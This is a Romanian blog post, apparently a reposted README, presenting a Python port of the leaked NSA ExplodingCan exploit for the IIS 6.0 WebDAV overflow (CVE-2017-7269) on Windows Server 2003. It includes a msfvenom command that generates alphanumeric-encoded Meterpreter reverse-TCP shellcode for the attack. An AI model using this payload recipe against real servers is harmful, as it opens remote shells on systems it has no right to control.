joi, 4 ianuarie 2018

ExplodingCan

ExplodingCan

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.
exploit

Details

  • Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
  • CVE: CVE-2017-7269
  • Disclosure date: March 31 2017
  • Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed encoder.
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode

Links

Share:

0 comentarii:

Trimiteți un comentariu

Donate

Your donations are used to improve resources !!!




Important !!!

Fiecare fisier downloadat trebuie scanat inaintea utilizarii !!
Noi nu se asumam nici un fel de responsabilitate pentru descarcarile dvs.

Categorii

Exploits (21) News (2) Programe (86) Show off (1) Tutoriale (17)

Parteneri

Blog Archive